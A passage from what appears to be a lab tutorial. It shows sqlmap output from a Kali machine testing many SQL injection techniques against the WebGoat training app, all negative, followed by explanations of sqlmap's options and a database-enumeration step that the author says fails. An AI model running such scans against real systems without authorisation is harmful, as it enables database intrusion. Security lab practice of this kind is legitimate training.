[02:32:56] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:32:56] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:56] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:32:57] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:32:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:32:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:32:57] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:32:57] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:32:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:32:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:32:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:32:58] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:32:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:32:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:32:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:32:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:32:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:32:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:59] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:33:00] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:33:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:33:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:33:00] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:33:00] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:33:00] [INFO] testing 'Oracle error-based - Parameter replace'
[02:33:00] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:33:00] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:33:00] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:33:00] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:33:00] [INFO] testing 'Generic inline queries'
[02:33:00] [INFO] testing 'MySQL inline queries'
[02:33:00] [INFO] testing 'PostgreSQL inline queries'
[02:33:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:33:00] [INFO] testing 'Oracle inline queries'
[02:33:00] [INFO] testing 'SQLite inline queries'
[02:33:00] [INFO] testing 'Firebird inline queries'
[02:33:00] [INFO] testing 'ClickHouse inline queries'
[02:33:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:33:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:33:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:33:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:33:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:33:00] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:33:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:33:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:33:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:33:01] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:33:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:33:02] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:33:02] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:33:02] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:33:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:33:03] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:33:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:33:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:33:03] [INFO] testing 'Oracle AND time-based blind'
[02:33:03] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:33:03] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:33:04] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:33:04] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:33:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:33:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:33:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:33:04] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:33:04] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:33:04] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:33:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:33:04] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:33:04] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:33:04] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:33:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:33:05] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:33:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:33:05] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:33:05] [WARNING] parameter 'Referer' does not seem to be injectable
[02:33:05] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 02:33:05 /2025-05-12/

┌──(kali㉿kali)-[~]
└─$ 


Parameter explanation:

  • -u: target URL
  • --batch: accept every default answer automatically (non-interactive)
  • --level=3, --risk=2: increase test depth (some vulnerabilities are only triggered with these settings)
  • --dbs: enumerate all database names

Step 3: Select a database and list its tables

If the previous step succeeded, you will see something like:

[INFO] the back-end DBMS is MySQL

[INFO] available databases [2]:

[*] information_schema

[*] webgoat

In practice this does not seem to succeed against WebGoat 2025.3, so it is not possible to continue.

(End)
